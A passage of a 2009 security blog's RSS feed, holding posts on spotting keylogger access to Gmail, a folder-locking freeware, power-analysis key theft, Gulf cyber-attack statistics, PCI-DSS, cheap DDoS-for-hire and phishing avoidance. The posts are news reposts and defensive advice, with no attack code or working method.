<p><span style="font-size: 11pt;">For more details &#8211; </span><span style="font-size: 11pt; letter-spacing: 0pt;"><a href="http://pib.nic.in/release/release.asp?relid=53617" target="_blank">http://pib.nic.in/release/release.asp?relid=53617</a></span></p>
<p><span style="font-size: 11pt; letter-spacing: 0pt;"><form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<br />
</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/10/28/notified-amended-indian-it-act-comes-into-effect/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Know My Gmail Account Has Been Hacked By Keylogger?</title>
		<link>http://techblog.cyberphunkz.com/2009/10/27/how-to-know-my-gmail-account-has-been-hacked-by-keylogger/</link>
		<comments>http://techblog.cyberphunkz.com/2009/10/27/how-to-know-my-gmail-account-has-been-hacked-by-keylogger/#comments</comments>
		<pubDate>Tue, 27 Oct 2009 13:48:05 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Gmail]]></category>
		<category><![CDATA[keylogger]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=412</guid>
		<description><![CDATA[There are chances of somebody access to your Gmail or Google Account without prior notice sent to acknowledge you. If you’ve recently login Gmail with a public computer at cyber cafe or a Internet-enabled system that is not administrated by you (e.g. office Desktop/Laptop that you don’t have root access privilege), remember to keep an eye at &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/10/27/how-to-know-my-gmail-account-has-been-hacked-by-keylogger/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>There are chances of somebody access to your <a href="http://mail.google.com/mail">Gmai</a>l or Google Account without prior notice sent to acknowledge you.</p>
<p>If you’ve recently login Gmail with a public computer at cyber cafe or a Internet-enabled system that is not administrated by you (e.g. office Desktop/Laptop that you don’t have root access privilege), remember to keep an eye at your Gmail account activities.</p>
<p>It doesn’t matter you’re login Gmail with HTTPS connection or Remote Desktopback to your secured system at home/office, a software keylogger running as service or hardware keylogger chip seated inside Desktop keyboard can easily recording all keystrokes pressed or capturing screen when you about to copy and paste the password in login form.</p>
<p>After your Google Account is hacked by keylogger, they are not likely to change your password for fun. Instead, the hackers will like to access your Gmail silently for other activities that interest them, e.g. confidential emails, social networks, accounting related login such as online banking, PayPal, eBay auction, etc.</p>
<p>So, <strong>how could you tell if someone has accessed your Gmail recently?</strong></p>
<p>Login to your Gmail and look at the bottom of page. There you read a statement similar to this</p>
<p>Last account activity: 48 minutes ago on this computer. Details<br />
(as shown in the screenshot below; highlighted in white):</p>
<p>After your Google Account is hacked by keylogger, they are not likely to change your password for fun. Instead, the hackers will like to access your Gmail silently for other activities that interest them, e.g. confidential emails, social networks, accounting related login such as online banking, PayPal, eBay auction, etc.</p>
<p><img class="aligncenter size-full wp-image-413" title="gmail" src="http://techblog.cyberphunkz.com/wp-content/uploads/2009/10/gmail.JPG" alt="gmail" width="401" height="126" /><br />
<script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ad_channel = "blog";
google_ui_features = "rc:10";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=728x90";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
<sup>Gmail account activity may able to tell if you Google Account has been hacked by a keylogger.</sup></p>
<p>Click the <strong>Details</strong> hyperlink, a pop-up page will shows you the table of Google Account login details – Access Type, IP Address, and Date/Time when those login took place.</p>
<p>At the bottom of Detail page, there is your current computer IP address that you can take note for next login audit (keep a habit of conducting login audit whenever you login to Gmail):</p>
<p>This computer is using IP address 89.211.85.96.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ad_channel = "blog";
google_ui_features = "rc:10";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=728x90";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
The IP Address of computer that you normally use to access Gmail is not likely changes (frequently). If it’s an office computer that access to Internet via proxy server, that WAN IP is rather f</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/10/27/how-to-know-my-gmail-account-has-been-hacked-by-keylogger/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Making a Password Protected, Locked Secure Folder in Windows XP</title>
		<link>http://techblog.cyberphunkz.com/2009/10/25/making-a-password-protected-locked-secure-folder-in-windows-xp/</link>
		<comments>http://techblog.cyberphunkz.com/2009/10/25/making-a-password-protected-locked-secure-folder-in-windows-xp/#comments</comments>
		<pubDate>Sun, 25 Oct 2009 07:43:14 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Buildings]]></category>
		<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Techno Blabber!]]></category>
		<category><![CDATA[free]]></category>
		<category><![CDATA[hide folder]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=406</guid>
		<description><![CDATA[There are several occasions when we need to protect some data by making apassword protected, locked and secure folder. But by default, Windows XP allows users to hide their folder by selecting “Hidden Folder” option. Do note that anyone can easily see the hidden folders by unlocking them from Windows XP menu, so if you &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/10/25/making-a-password-protected-locked-secure-folder-in-windows-xp/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>There are several occasions when we need to protect some data by making a<strong>password protected, locked and secure folder</strong>. But by default, Windows XP allows users to hide their folder by selecting “Hidden Folder” option. Do note that anyone can easily see the hidden folders by unlocking them from Windows XP menu, so if you need to keep a folder really secure by locking it with a strong password, then you should use a freeware called <strong><a title="Download from here" href="http://techblog.cyberphunkz.com/wp-content/uploads/FHFSetup.exe" target="_blank">Free Hide Folder</a></strong>.</p>
<p>Free Hide Folder works like a computer security software that can lock and hide your important files and no one will be able to access them. Using this tool you can add password to selected files and folders and make them unreachable from everyone. Now if you don’t want to share any file or folder with anyone, simply lock the folder using Free Hide Folder.</p>
<p><img class="alignleft size-full wp-image-407" title="free-hide-folder" src="http://techblog.cyberphunkz.com/wp-content/uploads/2009/10/free-hide-folder.jpg" alt="free-hide-folder" width="482" height="382" /></p>
<h3 style="font-family: Georgia, Geneva, Verdana; font-weight: bold; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 3px; padding-left: 0px; font-size: 17px; line-height: 20px; color: #000000;">Key Features of Free Hide Folder</h3>
<ol>
<li>Hides folder completely with strong password</li>
<li>Password protection to access locked folder</li>
<li>Lock as many folders as you want, no limit!</li>
<li>Simple and easy-to-use user interface</li>
<li>Supports Windows 9x/Me/NT/2000/XP/2003/Vista</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/10/25/making-a-password-protected-locked-secure-folder-in-windows-xp/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Leaking crypto keys from mobile devices</title>
		<link>http://techblog.cyberphunkz.com/2009/10/23/leaking-crypto-keys-from-mobile-devices/</link>
		<comments>http://techblog.cyberphunkz.com/2009/10/23/leaking-crypto-keys-from-mobile-devices/#comments</comments>
		<pubDate>Fri, 23 Oct 2009 18:22:20 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Buildings]]></category>
		<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Techno Blabber!]]></category>
		<category><![CDATA[crypto]]></category>
		<category><![CDATA[mobile phone]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=402</guid>
		<description><![CDATA[by Elinor Mills October 20, 2009 http://news.cnet.com/8301-27080_3-10379115-245.html Security researchers have discovered a way to steal cryptographic keys that are used to encrypt communications and authenticate users on mobile devices by measuring the amount of electricity consumed or the radio frequency emissions. The attack, known as differential power analysis (DPA), can be used to target an &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/10/23/leaking-crypto-keys-from-mobile-devices/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: 11pt;">by Elinor Mills</span></p>
<p><span style="font-size: 11pt;">October 20, 2009</span></p>
<p><span style="font-size: 11pt;"><a href="http://news.cnet.com/8301-27080_3-10379115-245.html" target="_blank">http://news.cnet.com/8301-27080_3-10379115-245.html</a></span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Security researchers have discovered a way to steal cryptographic keys that are used to encrypt communications and authenticate users on mobile devices by measuring the amount of electricity consumed or the radio frequency emissions.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The attack, known as differential power analysis (DPA), can be used to target an unsuspecting victim either by using special equipment that measures electromagnetic signals emitted by chips inside the device or by attaching a sensor to the device&#8217;s power supply, Benjamin Jun, vice president of technology at Cryptography Research, said on Tuesday. Cryptography Research licenses technology that helps companies prevent fraud, piracy, and counterfeiting.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">An oscilloscope can then be used to capture the electrical signals or radio frequency emissions and the data can be analyzed so that the spikes and bumps correlate to specific activity around the cryptography, he said.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: medium;"><span><em><img class="alignleft size-medium wp-image-403" title="image001" src="http://techblog.cyberphunkz.com/wp-content/uploads/2009/10/image001-300x227.jpg" alt="image001" width="300" height="227" /><br />
</em></span></span></p>
<p><em><span style="font-size: 11pt;">An oscilloscope and simple antenna can capture electromagnetic emissions from mobile devices. The large spikes correspond to secret keys used during cryptographic activity.</span></em></p>
<p><em><span style="font-size: 11pt;">(Credit: Cryptography Research)</span></em></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;While the chip performs cryptography it is massaging the secret key around in various ways. This processing causes information about the key to leak through the power consumption itself,&#8221; said Jun.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">For instance, someone with the proper equipment could steal the cryptographic key from a device three feet away in a cafe in as short a time as a few minutes, he said. An attacker could replicate the key with the information and use it to read a victim&#8217;s e-mail or pretend to be the user in sensitive online transactions.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Smartphones and PDAs have been found to leak data unless they have countermeasures in place to protect against it, which Cryptography Research offers, according to Jun.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">He would not say exactly which devices could be snooped on in this manner and said he did not know of any attacks in the wild using this method.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;I think we&#8217;re about to start seeing it on smartphones,&#8221; he said. &#8220;These attacks are not theoretical.&#8221;</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">This type of attack first surfaced about 10 years ago on cash register terminals and postage meters. Similar data leakage was found with smartIDs, secure USB tokens, smart cards, and cable boxes, he said.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Countermeasures can involve randomizing to throw noise into the measurements or changing the way the computation is done, Jun said.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Asked to comment on how threatening this type of attack could be, cryptography expert Bruce Schneier said the basic question is who stands to lose?</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;Honestly, I don&#8217;t care if someone hacks a cable box&#8211;it&#8217;s not my money. Similarly, I don&#8217;t care how often a bank gets robbed as long as the bank doesn&#8217;t deduct the losses out of my personal account,&#8221; he said in an e-mail. &#8220;But if someone hacks my phone and either steals service that I am charged for, or causes me enough hassle to change my phone number, that&#8217;s bad.&#8221;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/10/23/leaking-crypto-keys-from-mobile-devices/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Saudi Arabia under attack from cyber criminals</title>
		<link>http://techblog.cyberphunkz.com/2009/10/23/saudi-arabia-under-attack-from-cyber-criminals/</link>
		<comments>http://techblog.cyberphunkz.com/2009/10/23/saudi-arabia-under-attack-from-cyber-criminals/#comments</comments>
		<pubDate>Fri, 23 Oct 2009 18:13:49 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Saudi]]></category>
		<category><![CDATA[UAE]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=400</guid>
		<description><![CDATA[http://business.maktoob.com/20090000386986/Saudi_under_attack_from_cyber_criminals/Article.htm DUBAI &#8211; Saudi Arabia tops all Gulf countries in attacks by Internet hackers, UAE daily Emirates Business reported on Thursday, citing software firm Trend Micro. Of all the recorded cyber attacks in the first nine months of this year in the Gulf, 64 percent were directed at Saudi Arabia and 20 percent at the &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/10/23/saudi-arabia-under-attack-from-cyber-criminals/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: 11pt;"><a href="http://business.maktoob.com/20090000386986/Saudi_under_attack_from_cyber_criminals/Article.htm" target="_blank">http://business.maktoob.com/20090000386986/Saudi_under_attack_from_cyber_criminals/Article.htm</a></span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">DUBAI</span><span style="font-size: 11pt;"> &#8211; Saudi Arabia tops all Gulf countries in attacks by Internet hackers, UAE daily Emirates Business reported on Thursday, citing software firm Trend Micro.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Of all the recorded cyber attacks in the first nine months of this year in the Gulf, 64 percent were directed at Saudi Arabia and 20 percent at the UAE.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt; color: maroon;">There were 769,698 cases of “compromised systems breakdown” in Saudi Arabia and 248,034 in the UAE, according to Trend Micro data.</span></p>
<p><span style="font-size: 11pt; color: maroon;"> </span></p>
<p><span style="font-size: 11pt; color: maroon;">Kuwait</span><span style="font-size: 11pt; color: maroon;"> recorded 94,910, followed by Bahrain at 60,440 and Oman with 37,105 cyber attacks.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Due to high concentration of wealth, Internet security experts put the Gulf at high-risk of cyber threats as criminals try to steal vital data from the public, including information such as bank details and credit card information.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/10/23/saudi-arabia-under-attack-from-cyber-criminals/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Term of the Week: PCI-DSS</title>
		<link>http://techblog.cyberphunkz.com/2009/10/20/term-of-the-week-pci-dss/</link>
		<comments>http://techblog.cyberphunkz.com/2009/10/20/term-of-the-week-pci-dss/#comments</comments>
		<pubDate>Tue, 20 Oct 2009 13:44:00 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Techno Blabber!]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=397</guid>
		<description><![CDATA[Short for Payment Card Industry (PCI) Data Security Standard (DSS), PCI DSS is a standard that all organizations, including online retailers, must follow when storing, processing and transmitting their customer&#8217;s credit card data. The Data Security Standard (DSS) was developed and the standard is maintained by the Payment Card Industry Security Standards Council (PCI SSC).  &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/10/20/term-of-the-week-pci-dss/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: 11pt;">Short for Payment Card Industry (PCI) Data Security Standard (DSS), PCI DSS is a standard that all organizations, including online retailers, must follow when storing, processing and transmitting their customer&#8217;s credit card data. The Data Security Standard (DSS) was developed and the standard is maintained by the Payment Card Industry Security Standards Council (PCI SSC).  To be PCI complaint companies must use a firewall between wireless network and their cardholder data environment, use the latest security and authentication such as WPA/WPA2 and also change default settings for wired privacy keys, and use a network intrusion detection system.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The PCI DSS standard, as of September 2009 (DSS v 1.2), includes the following 12 requirements for best security practices:</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><em><span style="font-size: 11pt;">Build and Maintain a Secure Network</span></em></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">1. Install and maintain a firewall configuration to protect cardholder data</span></p>
<p><span style="font-size: 11pt;">2. Do not use vendor-supplied defaults for system passwords and other security parameters</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><em><span style="font-size: 11pt;">Protect Cardholder Data</span></em></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">3. Protect stored cardholder data</span></p>
<p><span style="font-size: 11pt;">4. Encrypt transmission of cardholder data across open, public networks</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><em><span style="font-size: 11pt;">Maintain a Vulnerability Management Program</span></em></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">5. Use and regularly update anti-virus software</span></p>
<p><span style="font-size: 11pt;">6. Develop and maintain secure systems and applications</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><em><span style="font-size: 11pt;">Implement Strong Access Control Measures</span></em></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">7. Restrict access to cardholder data by business need-to-know</span></p>
<p><span style="font-size: 11pt;">8. Assign a unique ID to each person with computer access</span></p>
<p><span style="font-size: 11pt;">9. Restrict physical access to cardholder data</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><em><span style="font-size: 11pt;">Regularly Monitor and Test Networks</span></em></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">10. Track and monitor all access to network resources and cardholder data</span></p>
<p><span style="font-size: 11pt;">11. Regularly test security systems and processes</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><em><span style="font-size: 11pt;">Maintain an Information Security Policy</span></em></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">12. Maintain a policy that addresses information security</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The PCI DSS may also be called PCI compliance or PCI requirements.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/10/20/term-of-the-week-pci-dss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>CRIME ECONOMY : $30 will buy a one-day DDoS attack now</title>
		<link>http://techblog.cyberphunkz.com/2009/10/20/crime-economy-30-will-buy-a-one-day-ddos-attack-now/</link>
		<comments>http://techblog.cyberphunkz.com/2009/10/20/crime-economy-30-will-buy-a-one-day-ddos-attack-now/#comments</comments>
		<pubDate>Tue, 20 Oct 2009 13:39:36 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Bad Ideas]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[botnet]]></category>
		<category><![CDATA[DDOS]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/2009/10/20/crime-economy-30-will-buy-a-one-day-ddos-attack-now/</guid>
		<description><![CDATA[With botnets everywhere, DDoS attacks get cheaper By Robert McMillan , IDG News Service, October 15, 2009 http://www.networkworld.com/news/2009/101509-with-botnets-everywhere-ddos-attacks.html?hpg1=bn Cyber-crime just doesn&#8217;t pay like it used to. Security researchers say the cost of criminal services such as distributed denial of service, or DDoS, attacks has dropped in recent months. The reason? Market economics. &#8220;The barriers to &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/10/20/crime-economy-30-will-buy-a-one-day-ddos-attack-now/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong><em><span style="font-size: 11pt; color: maroon;">With botnets everywhere, DDoS attacks get cheaper</span></em></strong></p>
<p><span style="font-size: 11pt;">By Robert McMillan ,</span></p>
<p><span style="font-size: 11pt;">IDG News Service,</span></p>
<p><span style="font-size: 11pt;">October 15, 2009</span></p>
<p><span style="font-size: 11pt;"><a href="http://www.networkworld.com/news/2009/101509-with-botnets-everywhere-ddos-attacks.html?hpg1=bn" target="_blank">http://www.networkworld.com/news/2009/101509-with-botnets-everywhere-ddos-attacks.html?hpg1=bn</a></span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Cyber-crime just doesn&#8217;t pay like it used to.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Security researchers say the cost of criminal services such as distributed denial of service, or DDoS, attacks has dropped in recent months. The reason? Market economics. &#8220;The barriers to entry in that marketplace are so low you have people basically flooding the market,&#8221; said Jose Nazario, a security researcher with Arbor Networks. &#8220;The way you differentiate yourself is on price.&#8221;</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Criminals have gotten better at hacking into unsuspecting computers and linking them together into so-called botnet networks, which can then be centrally controlled. Botnets are used to send spam, steal passwords, and sometimes to launch DDoS attacks, which flood victims&#8217; servers with unwanted information. Often these networks are rented out as a kind of criminal software-as-a-service to third parties, who are typically recruited in online discussion boards.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">DDoS attacks have been used to censor critics, take down rivals, wipe out online competitors and even extort money from legitimate businesses. Earlier this year a highly publicized DDoS attack targeted U.S. and South Korean servers, knocking a number of Web sites offline.</span></p>
<p><span style="font-size: 11pt;"><form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-396"></span><br />
</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Are botnet operators having to cut costs like other businesses in these troubled economic times? Security researchers don&#8217;t know if that&#8217;s been a factor, but they do say that the supply of infected machines has been growing. In 2008, Symantec&#8217;s Internet sensors counted an average of 75,158 active bot-infected computers per day, a 31 percent jump from the previous year.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">DDoS attacks may have cost hundreds or even thousands of dollars per day a few years ago, but in recent months researchers have seen them going for bargain-basement prices.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><strong><span style="font-size: 11pt; color: maroon;">Nazario has seen DDoS attacks offered in the US$100-per-day range, but according to SecureWorks Security Researcher Kevin Stevens, prices have dropped to $30 to $50 on some Russian forums.</span></strong></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt; color: maroon;">And DDoS attacks aren&#8217;t the only thing getting cheaper. Stevens says the cost of stolen credit card numbers and other kinds of identity information has dropped too. &#8220;Prices are dropping on almost everything,&#8221; he said.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">While $100 per day might cover a garden-variety 100MB/second to 400MB/second attack, it might also procure something much weaker, depending on the seller. &#8220;There&#8217;s a lot of crap out there where you don&#8217;t really know what you&#8217;re getting,&#8221; said Zulfikar Ramzan, a technical director with Symantec Security Response. &#8220;Even though we are seeing some lower prices, it doesn&#8217;t mean that you&#8217;re going to get the same quality of goods.&#8221;</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">In general, prices for access to botnet computers have dropped dramatically since 2007, he said. But with the influx of generic and often untrustworthy services, players at the high end can now charge more, Ramzan said.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/10/20/crime-economy-30-will-buy-a-one-day-ddos-attack-now/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to avoid getting Hooked!</title>
		<link>http://techblog.cyberphunkz.com/2009/10/12/how-to-avoid-getting-hooked/</link>
		<comments>http://techblog.cyberphunkz.com/2009/10/12/how-to-avoid-getting-hooked/#comments</comments>
		<pubDate>Mon, 12 Oct 2009 11:13:28 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[money]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[phishing]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=392</guid>
		<description><![CDATA[This post is one of a series devoted to online security. Millions of people have gotten &#8220;urgent&#8221; emails asking them to take immediate action to prevent some impending disaster. &#8220;Our bank has a new security system. Update your information now or you won&#8217;t be able to access your account,&#8221; or &#8220;We couldn&#8217;t verify your information; click &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/10/12/how-to-avoid-getting-hooked/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span style="font-style: italic;">This post is one of a <a href="http://techblog.cyberphunkz.com/tag/phishing/">series</a> devoted to online security.</span></p>
<p>Millions of people have gotten &#8220;urgent&#8221; emails asking them to take immediate action to prevent some impending disaster. &#8220;Our bank has a new security system. Update your information now or you won&#8217;t be able to access your account,&#8221; or &#8220;We couldn&#8217;t verify your information; click here to update your account.&#8221; Sometimes the email claims that something awful will happen to the sender (or a third party), as in &#8220;The sum of $30,000,000 is going to go to the Government unless you help me transfer it to your bank account.&#8221;</p>
<p>People who click on the links in these emails may see a web page that looks like a legitimate site they&#8217;ve visited before. Because the page looks familiar, these people enter their username, password, or other private information on the site. What they&#8217;ve actually done is given an unknown third party all the information needed to hijack their account, steal their money, or open up new lines of credit in their name. They just fell for a phishing attack.</p>
<p>The concept behind such an attack is pretty simple: Someone masquerades as someone else in an effort to fool you into sharing personal or other sensitive information with them. Phishers can masquerade as just about anyone, including banks, email and application providers, online merchants, online payment services, and even governments. And while some of these attacks are crude and easy to spot, many of them are sophisticated and well constructed. That fake email from &#8220;your bank&#8221; can look very real; the bogus &#8220;login page&#8221; you&#8217;re redirected to can seem completely legitimate.</p>
<p>The good news is there are things you can do to steer clear of phishing attacks:</p>
<ul>
<li><span style="font-weight: bold;">Be careful about responding to emails that ask you for sensitive information.</span>You should be wary of clicking on links in emails or responding to emails that are asking for things like account numbers, user names and passwords, or other personal information such as social security numbers. Most legitimate businesses will never ask for this information via email. Google doesn&#8217;t.</li>
</ul>
<ul>
<li><span style="font-weight: bold;">Go to the site yourself, rather than clicking on links in suspicious emails.</span> If you receive a communication asking for sensitive information but think it could be legitimate, open a new browser window and go to the organization&#8217;s website as you normally would (for instance, by using a bookmark or by typing out the address of the organization&#8217;s website). This will improve the chances that you&#8217;re dealing with the organization&#8217;s website rather than with a phisher&#8217;s website, and if there&#8217;s actually something you need to do, there will usually be a notification on the site. Also, if you&#8217;re not sure about a request you&#8217;ve received, don&#8217;t be afraid to contact the organization directly to ask. It takes just a few minutes to go to the organization&#8217;s website, find an email address or phone number for customer support, and reach out to confirm whether the request is legitimate.</li>
</ul>
<ul>
<li><span style="font-weight: bold;">If you&#8217;re on a site that&#8217;s asking you to enter sensitive information, check for signs of anything suspicious.</span> If you&#8217;re on a site that&#8217;s asking for sensitive information &#8212; no matter how you got there &#8212; check for the signs that it&#8217;s really the official website for the organization. For example, check the URL to make sure the page is actually part of the organization&#8217;s website, and not a fraudulent page on a different domain (such as mybankk.com or g00gle.com.) If you&#8217;re on a page that should be secured (like one asking you to enter in your credit card information) look for &#8220;<span style="font-weight: bold;">https</span>&#8221; at the beginning of the URL and the padlock icon in the browser. (In Firefox and Internet Explorer 6, the padlock appears in the bottom right-hand corner, while in Internet Explorer 7 the padlock appears on the right-hand side of the address bar.) These signs aren&#8217;t infallible, but they&#8217;re a good place to start.</li>
</ul>
<ul>
